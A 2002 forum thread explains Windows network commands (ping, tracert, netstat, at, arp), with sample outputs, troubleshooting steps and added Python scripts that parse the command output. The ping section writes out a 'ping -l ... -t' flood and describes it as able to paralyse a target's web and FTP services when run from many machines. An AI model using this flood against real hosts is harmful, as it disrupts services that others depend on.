Topic: Basic network commands    Topic author: Tiger
============================================================
Title: Basic network commands
Date: 2002-11-09
Content:
PING

I. Basics

ping is one of the most useful commands in the TCP/IP suite. It sends a series of packets to another system, which in turn sends replies back. This utility is useful for locating a remote host: the result tells you whether the host can be reached and how long it takes the host to return a packet.

Usage:
  ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] | [-k host-list]] [-w timeout] destination-list

Options:
  -t                 Ping the specified host until interrupted. (Keeps pinging until you abort it.)
  -a                 Resolve addresses to hostnames. (Resolves the computer's NetBIOS name.)
  -n count           Number of echo requests to send. (Sends the number of echo packets given by count; the default is 4.)
  -l size            Send buffer size. (Sends echo packets of the given size; the default is 32 bytes, the maximum 65,527.)
  -f                 Set Don't Fragment flag in packet. (Sets the "do not fragment" flag in the packet.)
  -i TTL             Time To Live. (How long the packet may live on its way to the other side.)
  -v TOS             Type Of Service. (Service type.)
  -r count           Record route for count hops. (Records the routers passed, hop by hop, in the "Record Route" field; count must be at least 1 and at most 9 computers.)
  -s count           Timestamp for count hops. (Records the time at each recorded routing hop.)
  -j host-list       Loose source route along host-list. (Routes the packet via the computers in host-list; consecutive computers may be separated by intermediate gateways (loose source routing). IP allows at most 9.)
  -k host-list       Strict source route along host-list. (Routes the packet via the computers in host-list; consecutive computers may not be separated by intermediate gateways (strict source routing). IP allows at most 9.)
  -w timeout         Timeout in milliseconds to wait for each reply. (Specifies the wait interval, in milliseconds.)
  destination-list   (The remote computer to ping.)

In practice this command is mainly used to see how fast the other side responds. If the result ping gives you is "Request timed out", then you cannot reach that host at all; it is not within your reach.
II. Usage examples

-t: Pings non-stop .......... until you press CTRL-C. This option has no special trick by itself, but it can be combined with other parameters. No example.

-a:
  C:\> ping -a 218.19.49.213

  Pinging sjj [218.19.49.213] with 32 bytes of data:        [I am sending 32-byte packets to 218.19.49.213]

  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116      [arrived correctly / size 32 bytes / time taken 62 ms / time to live]
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116

  Ping statistics for 218.19.49.213:                         [data statistics]
      Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
  Approximate round trip times in milli-seconds:
      Minimum = 0ms, Maximum = 0ms, Average = 0ms

From the above you can tell that the computer with IP 218.19.49.213 has the NetBIOS name SJJ.
-n: Normally only four packets are sent. With this option you can define how many are sent, which is very helpful for measuring network speed. For example, I want to know, when 50 packets are sent, the average return time, the fastest time and the slowest time:
  C:\> ping -n 50 218.19.49.213

  Pinging 218.19.49.213 with 32 bytes of data:

  Reply from 218.19.49.213: bytes=32 time=71ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=61ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=61ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=61ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=61ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
  Reply from 218.19.49.213: bytes=32 time=60ms TTL=116

  Ping statistics for 218.19.49.213:
      Packets: Sent = 50, Received = 50, Lost = 0 (0% loss),
  Approximate round trip times in milli-seconds:
      Minimum = 50ms, Maximum = 71ms, Average = 57ms
From the above I can tell that of the 50 packets sent to 218.19.49.213, 50 came back; the fastest of the 50 returned in 50 ms, the slowest in 71 ms, and the average was 57 ms.

-l: By default the packet Windows sends is 32 bytes. We can also define its size, but there is a limit: at most 65500 bytes can be sent. Someone may ask why it is limited to 65500 bytes. The reason is that the Windows series (and perhaps other systems) had a security vulnerability: if the other side received a packet of 65532 bytes or more, it was very likely to hang, so Microsoft fixed this hole and then limited the packet size ping can send. Although Microsoft imposed this limit, this parameter is still very powerful in combination with the other parameters. For example, combined with -t it becomes an aggressive command (a network storm; it must not be used lightly):
  C:\> ping -l aaaaa -t xxx.xxx.xxx.xxx
This sends packets of aaaaa bytes to the computer xxx.xxx.xxx.xxx. If you have only one computer there is no effect, but with many computers the other side can be completely paralysed: the network is severely congested and the HTTP and FTP services stop entirely, so its power is not small.
-f: The packets you send are normally fragmented by the routers along the way; with this flag set, the routers will not fragment them.

-i: Used to help you check how the network is operating.

-r: Normally the packet you send reaches the other side through some route, but which route? With this parameter you can set how many routers you want to detect, up to a limit of 9, that is, you can only trace 9 routers. If you want to detect more, other commands can do it; I will explain them to everyone in a future article. Here is an example:
  C:\> ping -n 1 -r 9 218.19.49.213          (send one packet, record up to 9 routers)

  Pinging 218.19.49.213 with 32 bytes of data:

  time=80ms TTL=116
      -> 61.187.255.
      -> 61.144.0.53
      -> 61.144.0.65

  Ping statistics for 218.19.49.213:
      Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
  Approximate round trip times in milli-seconds:
      Minimum = 80ms, Maximum = 80ms, Average = 80ms

From the above you can tell that these are the routers between my computer and 218.19.49.213.
-s: Similar to -r, but this parameter does not record the route the packet passed through, and only 4 entries are recorded.

-j: Routes the packet via the computers in computer-list. Consecutive computers may be separated by intermediate gateways (loose source routing). IP allows at most 9.

-k: Routes the packet via the computers in computer-list. Consecutive computers may not be separated by intermediate gateways (strict source routing). IP allows at most 9.

-w: This parameter has no other tricks.
Other tips for the ping command:

1. In general you can also roughly judge from the TTL value the other side returns whether the target host runs a Windows series system or a UNIX/Linux series system: the TTL returned by Windows series systems is usually between 100 and 130, and the TTL returned by UNIX/Linux series systems is between 240 and 255. Of course the TTL value can be modified on the other side; on Windows series systems it can be changed through the following registry value:
  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
  "DefaultTTL"=dword:000000FF
  (255 = FF, 128 = 80, 64 = 40, 32 = 20)

2. Typical order for diagnosing network faults with ping
Normally, when you use ping to locate a problem or to verify that the network is working, you need to run many ping commands. If they all run correctly, you can trust that basic connectivity and the configuration parameters are fine; if some of them fail, that also indicates where to look for the problem. A typical detection order, with the possible faults each step reveals, is given below:

Ping 127.0.0.1 - This ping is sent to the IP software of the local computer and never leaves the computer. If it fails, there is some very basic problem with the installation or running of TCP/IP.

Ping the local IP - This ping is sent to the IP address configured on your computer, and your computer should answer it. If it does not, there is a problem with the local configuration or installation. When this problem occurs, LAN users should unplug the network cable and run the command again. If the command succeeds with the network disconnected, another computer may be using the same IP address.

Ping another IP on the LAN - This ping should leave your computer, reach another computer through the NIC and the network cable, and come back. Receiving a reply shows that the NIC and the carrier on the local network are working correctly. If you receive 0 replies, then the subnet mask (which, when the network is subnetted, separates the network part of the IP address from the host part) is wrong, or the network card is misconfigured, or there is a problem with the cabling.

Ping the gateway IP - If this ping is answered correctly, the gateway router on the LAN is running and able to respond.

Ping a remote IP - If you receive 4 replies, the default gateway is being used successfully. For dial-up users it means the Internet is reachable (but this does not rule out a problem with the ISP's DNS).

Ping localhost - localhost is a name the operating system reserves for the network. It is an alias of 127.0.0.1, and every computer should be able to convert the name into this address. If it cannot, there is a problem in the hosts file (/windows/host).

Ping http://www.yahoo.com/ - To ping this domain, your computer must first convert the domain name into an IP address, usually through the DNS server. If this step fails, either the IP address of the DNS server is configured incorrectly or the DNS server itself is faulty. By the way, you can also use this command to convert a domain name into an IP address. If all the ping commands listed above run normally, you can be confident that your computer can communicate locally and remotely. However, the success of these commands does not mean that all of your network configuration is correct; for example, some subnet mask errors may not be detected by these methods.
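An added example, not code from the original post: the following Python script parses the text that ping prints, recomputes the statistics block the way the -n example above reads it (packets sent, received, lost, fastest, slowest, average), and applies the TTL rule of thumb from the tips above. Its input is a constructed sample, not output from the post. The hop estimate goes one step beyond the post's rule by assuming the common initial TTL values 64, 128 and 255.

```python
import re

# Constructed sample in the format Windows ping prints (not output captured
# from the original post): four replies, one of them "time<10ms", and one timeout.
SAMPLE_PING_OUTPUT = """\
Pinging 218.19.49.213 with 32 bytes of data:

Reply from 218.19.49.213: bytes=32 time=71ms TTL=116
Reply from 218.19.49.213: bytes=32 time=60ms TTL=116
Reply from 218.19.49.213: bytes=32 time<10ms TTL=116
Request timed out.
Reply from 218.19.49.213: bytes=32 time=50ms TTL=116
"""

REPLY_RE = re.compile(
    r"Reply from (?P<ip>[\d.]+): bytes=(?P<bytes>\d+) "
    r"time(?P<op>[=<])(?P<ms>\d+)ms TTL=(?P<ttl>\d+)"
)
TIMEOUT_RE = re.compile(r"Request timed out\.")


def parse_ping(text):
    """Return (replies, timeouts). Each reply is a dict with ip, bytes, ms, ttl.
    A "time<10ms" reply counts as 0 ms, which is how the Windows summary treats it."""
    replies, timeouts = [], 0
    for line in text.splitlines():
        m = REPLY_RE.search(line)
        if m:
            ms = 0 if m.group("op") == "<" else int(m.group("ms"))
            replies.append({"ip": m.group("ip"), "bytes": int(m.group("bytes")),
                            "ms": ms, "ttl": int(m.group("ttl"))})
        elif TIMEOUT_RE.search(line):
            timeouts += 1
    return replies, timeouts


def ping_statistics(replies, timeouts):
    """Recompute the "Ping statistics" summary: counts, loss and min/max/avg.
    The average is truncated to an integer, matching the Windows output."""
    sent = len(replies) + timeouts
    times = [r["ms"] for r in replies]
    return {
        "sent": sent,
        "received": len(replies),
        "lost": timeouts,
        "loss_pct": (100 * timeouts // sent) if sent else 0,
        "min": min(times) if times else None,
        "max": max(times) if times else None,
        "avg": (sum(times) // len(times)) if times else None,
    }


def guess_os_from_ttl(ttl):
    """The post's rule of thumb: Windows answers with TTL 100-130, UNIX/Linux with 240-255."""
    if 100 <= ttl <= 130:
        return "Windows series"
    if 240 <= ttl <= 255:
        return "UNIX/Linux series"
    return "unknown"


def estimate_hops(ttl):
    """Beyond the post: hosts usually start at a TTL of 64, 128 or 255, so the
    smallest of those not below the observed TTL, minus the observed TTL, is
    roughly how many routers the reply crossed. Returns None for TTL > 255."""
    for initial in (64, 128, 255):
        if ttl <= initial:
            return initial - ttl
    return None


def summarize(text):
    """Parse one ping run and return its statistics plus the TTL-based guesses."""
    replies, timeouts = parse_ping(text)
    stats = ping_statistics(replies, timeouts)
    if replies:
        ttl = replies[-1]["ttl"]
        stats["os_guess"] = guess_os_from_ttl(ttl)
        stats["hops_estimate"] = estimate_hops(ttl)
    return stats


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_PING_OUTPUT).items():
        print(f"{key}: {value}")
```

Feed it the saved output of a real ping run (`ping -n 50 host > run.txt`) and the statistics block is reproduced from the reply lines, which also makes a silently dropped reply visible as a loss percentage rather than something you have to count by eye.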
------------------------------------------------------------
author: tiger    date: 2002-11-09    content: Tracert

I. Basic knowledge

Tracert is a utility that verifies the path to a remote host.

Usage:
  tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
Options:
  -d               Do not resolve addresses to hostnames. (With -d you set, while the program traces the path, whether the domain names of the hosts along it are resolved.)
  -h maximum_hops  Maximum number of hops to search for target. (Specifies the maximum number of hops to search.)
  -j host-list     Loose source route along host-list. (Follows the addresses in the host list.)
  -w timeout       Wait timeout milliseconds for each reply. (Specifies the wait interval; the program's default time unit is ms.)

Main function: determines the path a packet takes to the host, displaying the relay nodes the packet passes through and the time it takes to reach each of them.

II. Examples

1. Suppose we want to know the detailed transmission path between our own computer and the target computer http://www.adsl4u.net/. Type at the DOS prompt:
  C:\> tracert http://www.adsl4u.net/

  Tracing route to http://www.adsl4u.net/ [211.154.211.3]
  over a maximum of 30 hops:

    1    50 ms    40 ms    50 ms  61.187.71.219
    2    40 ms    40 ms    50 ms  61.187.70.41
    3    40 ms    40 ms    50 ms  61.187.134.254
    4    40 ms    40 ms    50 ms  61.187.255.81
    5    40 ms    41 ms    50 ms  61.187.255.70
    6    50 ms    50 ms    50 ms  P-4-0-r1-c-gdgz1.cn.net [202.97.40.101]
    7    80 ms    80 ms    80 ms  202.97.38.162
    8    80 ms    80 ms    81 ms  202.96.12.38
    9    80 ms    80 ms    80 ms  202.106.192.158
   10    81 ms    80 ms    80 ms  202.96.13.134
   11    81 ms    80 ms    80 ms  211.154.209.26
   12    80 ms    80 ms    80 ms  211.154.211.3

  Trace complete.
From the above we get back, as the result of the run, the list of relay stations the packet passed through, with the time taken at each relay station. This feature is similar to the ping command, but what it shows is more detailed than ping: for a request packet you send to a certain site, it tells you every router it passed through, the IP of each router, and how long it took through each IP. From these times we can easily find out where, between the user's host and the target website, the problem lies.
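An added example, not code from the original post: this Python script parses the text tracert prints and answers the question the paragraph above raises, namely where between your host and the target the delay appears. It reports hops that never answered (three "*" probes) and the first hop whose best round-trip time jumps by more than a threshold over the previous responding hop. The input is a constructed trace with documentation addresses, not the trace from the post.

```python
import re

# Constructed sample in the format Windows tracert prints (not the trace from the
# original post): one hop that does not answer and a latency jump at hop 5.
SAMPLE_TRACERT_OUTPUT = """\
Tracing route to www.example.net [203.0.113.10]
over a maximum of 30 hops:

  1    50 ms    40 ms    50 ms  192.0.2.1
  2    40 ms    40 ms    50 ms  192.0.2.41
  3     *        *        *     Request timed out.
  4    50 ms    50 ms    50 ms  gw1.example.net [198.51.100.7]
  5    80 ms    80 ms    80 ms  198.51.100.162
  6    80 ms    81 ms    80 ms  203.0.113.10

Trace complete.
"""

# One hop line: hop number, three round-trip columns ("50 ms", "<1 ms" or "*"), then the host.
HOP_RE = re.compile(
    r"^\s*(?P<hop>\d+)\s+(?P<t1>\*|<?\d+ ms)\s+(?P<t2>\*|<?\d+ ms)\s+(?P<t3>\*|<?\d+ ms)\s+(?P<host>.+?)\s*$"
)
NAMED_HOST_RE = re.compile(r"^(?P<name>\S+) \[(?P<ip>[\d.]+)\]$")
IP_RE = re.compile(r"^[\d.]+$")


def _rtt(token):
    """'50 ms' -> 50, '<1 ms' -> 1, '*' -> None (no reply within the timeout)."""
    if token == "*":
        return None
    return int(re.search(r"\d+", token).group())


def parse_tracert(text):
    """Return one dict per hop: hop, rtts (list of int or None), name, ip."""
    hops = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if not m:
            continue
        host = m.group("host")
        named = NAMED_HOST_RE.match(host)
        if named:
            name, ip = named.group("name"), named.group("ip")
        elif IP_RE.match(host):
            name, ip = None, host
        else:
            name, ip = host, None          # e.g. "Request timed out."
        hops.append({
            "hop": int(m.group("hop")),
            "rtts": [_rtt(m.group(k)) for k in ("t1", "t2", "t3")],
            "name": name,
            "ip": ip,
        })
    return hops


def unresponsive_hops(hops):
    """Hop numbers where all three probes timed out."""
    return [h["hop"] for h in hops if all(r is None for r in h["rtts"])]


def first_latency_jump(hops, threshold_ms=20):
    """Hop number where the best round-trip time first rises by at least
    threshold_ms over the previous responding hop, or None if it never does.
    Silent hops are skipped rather than treated as a jump."""
    previous = None
    for h in hops:
        answered = [r for r in h["rtts"] if r is not None]
        if not answered:
            continue
        best = min(answered)
        if previous is not None and best - previous >= threshold_ms:
            return h["hop"]
        previous = best
    return None


if __name__ == "__main__":
    parsed = parse_tracert(SAMPLE_TRACERT_OUTPUT)
    for h in parsed:
        print(h["hop"], h["rtts"], h["name"] or h["ip"])
    print("silent hops:", unresponsive_hops(parsed))
    print("latency jump at hop:", first_latency_jump(parsed))
```

A hop that shows three "*" is not necessarily broken: many routers simply rate-limit or drop the ICMP replies tracert relies on, which is why the jump detector compares only hops that answered and reports silent hops separately.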
If we add some parameters after the tracert command we can also detect other, more detailed information (no detailed example here). E.g. with the parameter -d you can set, while the program traces the host's path, whether the domain name of the target host is resolved.
------------------------------------------------------------
author: tiger    date: 2002-11-09    content: netstat

I. Basic knowledge of netstat

netstat is a utility for observing the state of network connections. The netstat command displays the details of the currently active network connections, such as Ethernet statistics, and shows all protocols, including the TCP, UDP and IP protocols, the routing table and network interface information, so the user can find out what network connections are currently running. Online you can find tools such as X-NetStat, which are nothing more than the same features behind a Windows interface; they are more intuitive, but the functionality is almost the same.

Usage: Displays protocol statistics and current TCP/IP network connections. (Display protocols and current network connections.)
  netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
  -a            Displays all connections and listening ports. (Shows all connections and listening ports.)
  -e            Displays Ethernet statistics. This may be combined with the -s option. (Shows Ethernet statistics; can be combined with -s.)
  -n            Displays addresses and port numbers in numerical form. (Shows addresses and port numbers as numbers.)
  -p proto      Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP. (Shows the connections of the protocol given by proto; proto can be TCP or UDP. If the -s option is used to show per-protocol statistics, proto can be TCP, UDP, ICMP or IP.)
  -r            Displays the routing table. (Shows routing table information.)
  -s            Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset. (Shows statistics for each protocol. By default the statistics of TCP, UDP, ICMP and IP are shown; the -p option can be used to select a subset of the default.)
  interval      Redisplays selected statistics, pausing interval seconds between each display. Press CTRL+C to stop redisplaying statistics. (Re-displays the selected statistics, pausing interval seconds between displays. Stop with CTRL+C. If this parameter is omitted, netstat prints the current configuration information once.)

II. Examples

1. View the current network connection state
  C:\> netstat -a
  Active Connections                               (port type)  (local address)  (foreign address)  (state)

    Proto  Local Address          Foreign Address        State
    TCP    adsl1688:telnet        adsl1688:0             LISTENING    [port type TCP, port telnet, listening state]
    TCP    adsl1688:epmap         adsl1688:0             LISTENING
    TCP    adsl1688:microsoft-ds  adsl1688:0             LISTENING
    TCP    adsl1688:1025          adsl1688:0             LISTENING
    TCP    adsl1688:1027          adsl1688:0             LISTENING    [port type TCP, port 1027, listening state]
    TCP    adsl1688:1131          adsl1688:0             LISTENING
    ............................................
    UDP    adsl1688:epmap         *:*
    UDP    adsl1688:microsoft-ds  *:*
    UDP    adsl1688:1026          *:*                                 [port type UDP, port 1026]
    ............................................

With this parameter you can clearly see all the ports currently open on your computer, both TCP and UDP. We can use it frequently to check whether the system's services are normal and whether a "hacker" has left a back door, a Trojan and so on. I think we should make a habit of it: right after installing the system, I run netstat -a to see which ports are open and write them down, so that I have a reference later; when I find an unknown port, I can take countermeasures in time. Because this parameter also shows which IPs are currently connected to your server, it is also a real-time intrusion detection tool: if you find an IP connected to an unusual port, you can take effective countermeasures in time as well.
  C:\> netstat -n -a
  Active Connections                               [active connections]

    TCP    192.168.0.1:139        0.0.0.0:0              LISTENING
    ......
    TCP    218.76.6.122:139       0.0.0.0:0              LISTENING
    TCP    218.76.6.122:3038      61.186.175.113:2887    ESTABLISHED  [now the IP address and port number are clearly visible]
    UDP    0.0.0.0:135            *:*
    .............................................

2. View Ethernet statistics
  C:\> netstat -e -a
  Interface Statistics                             [interface statistics]

                             Received        Sent       [received / sent]
  Bytes                      4054478         7804 6158
  Non-unicast packets        283             286
  Discards                   0               0
  Errors                     0               0
  Unknown protocols          1564                       [unknown protocol]

3. View routing information
  C:\> netstat -r

  Route Table                                      [routing table]
  ===========================================================================
  Interface List
  ......
  ===========================================================================
  Active Routes:                                   [active routes]
  Network Destination    Netmask    Gateway    Interface    Metric
  ......
  Default Gateway:       218.76.6.122                 [default gateway]
  ===========================================================================

Column meanings: Network Destination [host], Netmask [subnet mask], Gateway [gateway], Interface [interface], Metric [number of hops]. (About the metric: we use it to define the distance, or cost, between two routers; the formula is 10^8 / speed (bps), that is, the larger the bandwidth of the line, the smaller its distance. Thanks to teacher Neekol for the explanation.)
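An added example, not code from the original post: the post's advice in the netstat -a section is to record the open ports right after installing the system and compare against that record later, and to watch which foreign IPs are connected. The Python script below does exactly that comparison over two saved `netstat -a -n` snapshots. Both snapshots are constructed samples (the new listener on port 5555 and the peer 203.0.113.9 are made up), not output from the post.

```python
# Constructed "netstat -a -n" snapshots (not output from the original post).
# BASELINE is taken right after installing the system, as the post advises;
# CURRENT is a later snapshot with one new listener and one connection to it.
BASELINE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    192.168.0.1:139        0.0.0.0:0              LISTENING
  TCP    218.76.6.122:139       0.0.0.0:0              LISTENING
  UDP    0.0.0.0:135            *:*
"""

CURRENT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    192.168.0.1:139        0.0.0.0:0              LISTENING
  TCP    218.76.6.122:139       0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5555           0.0.0.0:0              LISTENING
  TCP    218.76.6.122:5555      203.0.113.9:2887       ESTABLISHED
  UDP    0.0.0.0:135            *:*
"""


def parse_netstat(text):
    """Return one dict per TCP/UDP row: proto, local_ip, local_port,
    foreign_ip, foreign_port, state. Header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue
        local_ip, local_port = parts[1].rsplit(":", 1)
        foreign_ip, foreign_port = parts[2].rsplit(":", 1)
        rows.append({
            "proto": parts[0],
            "local_ip": local_ip, "local_port": int(local_port),
            "foreign_ip": foreign_ip, "foreign_port": foreign_port,   # "*" for UDP
            "state": parts[3] if len(parts) > 3 else "",             # UDP rows have no state
        })
    return rows


def listening_ports(rows):
    """Set of (proto, port) the host accepts traffic on. UDP sockets have no
    state column, so every UDP row counts as a listener."""
    return {(r["proto"], r["local_port"]) for r in rows
            if r["proto"] == "UDP" or r["state"] == "LISTENING"}


def new_listeners(baseline_text, current_text):
    """Ports open now that were not open in the recorded baseline, sorted."""
    before = listening_ports(parse_netstat(baseline_text))
    after = listening_ports(parse_netstat(current_text))
    return sorted(after - before)


def established_peers(text):
    """(local_port, foreign_ip, foreign_port) for every ESTABLISHED TCP
    connection, i.e. who is connected to this machine right now."""
    return [(r["local_port"], r["foreign_ip"], int(r["foreign_port"]))
            for r in parse_netstat(text) if r["state"] == "ESTABLISHED"]


if __name__ == "__main__":
    print("new listeners since baseline:", new_listeners(BASELINE, CURRENT))
    print("established connections:", established_peers(CURRENT))
```

Save the baseline with `netstat -a -n > baseline.txt` once the machine is set up, and run the comparison against a fresh snapshot whenever something looks off; a listener that is not in the baseline is exactly the "unknown port" the post tells you to investigate, and the established list tells you who is talking to it.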
------------------------------------------------------------
author: tiger    date: 2002-11-09    content: AT
Earlier I mentioned several network detection and analysis tools: the IP detection tool ping, the network statistics tool netstat and the route tracing tool tracert. Here is one more interesting network command. Speaking of that, I have to mention the tracing software Ping Plotter (heh, a plug), which covers all the functions of the three network commands above and presents the results both as data and graphically, making the detection and analysis results more intuitive and easier to understand. You can learn how to download and use Ping Plotter by yourself; it is easy, so let's come back to the topic. Actually the ideal command to discuss next would be net start from the net commands, but that is better left for later; just mentioning it here.

Usage: The AT command schedules commands and programs to run on a computer at a specified date and time. The Schedule service must be running to use the AT command.
  at [\\computername] [[id] [/delete] | /delete [/yes]]
  at [\\computername] time [/interactive] [/every:date[,...] | /next:date[,...]] "command"
  \\computername      Specifies a remote computer. If this parameter is omitted, the command runs on the local computer.
  id                  Specifies the identification number assigned to a scheduled command.
  /delete             Deletes a scheduled command. If id is omitted, all scheduled commands on the computer are deleted.
  /yes                Used with /delete to delete all jobs without asking for further confirmation.
  time                Specifies the time at which the command runs.
  /interactive        Allows the job to interact with the desktop of the user who is logged on at the time the job runs.
  /every:date[,...]   Runs the command on each specified day of the week or month. If date is omitted, the current day is assumed.
  /next:date[,...]    Runs the command on the next occurrence of the specified day (for example, next Thursday). If date is omitted, the current day is assumed.
  "command"           The Windows NT command or batch program to run.
II. Examples

1. Create a new task (a rough one first; net start comes later ............)
  C:\> at 23:00 start
  C:\> at 23:00 start C:\courage.mp3
  Added a new job with job ID = 1
  [Now we have created a task that makes the system automatically play the song "Courage" at 23:00.]

2. View the tasks (schedule)
  C:\> at                                           [view existing tasks]
  Status ID   Day                     Time          Command Line
  -------------------------------------------------------------------------------
          1   Today                   23:00 PM      start C:\courage.mp3

3. Delete this command
  C:\> at 1 /delete                                 [delete task no. 1]
  C:\> at                                           [now the list is empty]
  The list is empty.

The at command can only be used on 2000.
Edited by Tiger on 2002-11-09 18:03:24
------------------------------------------------------------
author: tiger    date: 2002-11-09    content: ARP

I. Basic knowledge

ARP is an important TCP/IP protocol, used to determine the physical (network card) address corresponding to an IP address. With the arp command you can view the current contents of the ARP cache of the local computer or of another computer. In addition, with the arp command you can manually enter static physical-address/IP-address pairs; you might do this for the default gateway and local servers, which helps to reduce the amount of traffic on the network. By default the entries in the ARP cache are dynamic: whenever a datagram is sent to a given address and there is no current entry in the cache, ARP adds one automatically. Once an entry is put in the cache it starts to age out, so if there are few or no entries in the ARP cache, don't be surprised; you can add them by pinging another computer or a router. So when you need to view the contents of the cache with the arp command, first ping the computer in question (the ping cannot be skipped).

Usage: Displays and modifies the IP-to-Physical address translation tables used by address resolution protocol (ARP). (Shows and modifies the table that the "Address Resolution Protocol" (ARP) uses to translate IP addresses to Ethernet physical addresses.)
  arp -s inet_addr eth_addr [if_addr]
  arp -d inet_addr [if_addr]
  arp -a [inet_addr] [-N if_addr]
  -a            Displays current ARP entries by interrogating the current protocol data. If inet_addr is specified, the IP and physical addresses for only the specified computer are displayed. If more than one network interface uses ARP, entries for each ARP table are displayed. (Shows the current ARP entries by querying TCP/IP. If inet_addr is given, only the IP and physical address of that computer are shown.)
  -g            Same as -a. (Same as -a.)
  inet_addr     Specifies an internet address. (Specifies the IP address, in dotted decimal notation.)
  -N if_addr    Displays the ARP entries for the network interface specified by if_addr. (Shows the ARP entries of the network interface given by if_addr.)
  -d            Deletes the host specified by inet_addr. inet_addr may be wildcarded with * to delete all hosts. (Removes the entry given by inet_addr.)
  -s            Adds the host and associates the Internet address inet_addr with the physical address eth_addr. The physical address is given as 6 hexadecimal bytes separated by hyphens. The entry is permanent. (Adds an entry to the ARP cache associating the IP address inet_addr with the physical address eth_addr. The physical address is given as 6 hexadecimal bytes separated by hyphens; the IP address is given in dotted decimal notation. The entry is permanent, that is, it is not deleted from the cache automatically when the timeout expires.)
  eth_addr      Specifies a physical address. (Specifies the physical address.)
  if_addr       If present, this specifies the Internet address of the interface whose address translation table should be modified. If not present, the first applicable interface will be used. (Specifies the IP address of the interface whose address translation table is to be modified, if any. If absent, the first applicable interface is used.)

II. Example

  Microsoft Windows 2000 [Version 5.00.2195]
  (C) Copyright 1985-2000 Microsoft Corp.
C: /> ping 192.168.0.10
Pinging 192.168.0.10 with 32 bytes of data:
Reply from 192.168.0.10: bytes = 32 TIME <10ms TTL = 128 reply from 192.168.0.10: bytes = 32 TIME <10ms TTL = 128 reply from 192.168.0.10: BYtes = 32 TIME <10MS TTL = 128 reply from 192.168.0.10 : bytes = 32 TIME <10ms TTL = 128PING Statistics for 192.168.0.10: Packets: SENT = 4, Received = 4, Lost = 0 (0% Loss), Approximate Round Trip Times in Milli-Seconds: minimum = 0ms, Maximum = 0ms, average = 0ms
C:\> arp -a        [view all entries in the cache]

Interface: 192.168.0.65 on Interface 0x2
  Internet Address      Physical Address      Type
  192.168.0.10          00-00-00-11-22-33     dynamic
  192.168.0.68          -80-C8-AD-D2-CD       dynamic
  192.168.0.255         12-50-BA-00-22-98     dynamic

C:\> arp -s 192.168.0.10 00-00-00-11-22-33        [manually enter a static entry in the ARP cache]

Interface: 192.168.0.65 on Interface 0x02
  Internet Address      Physical Address      Type
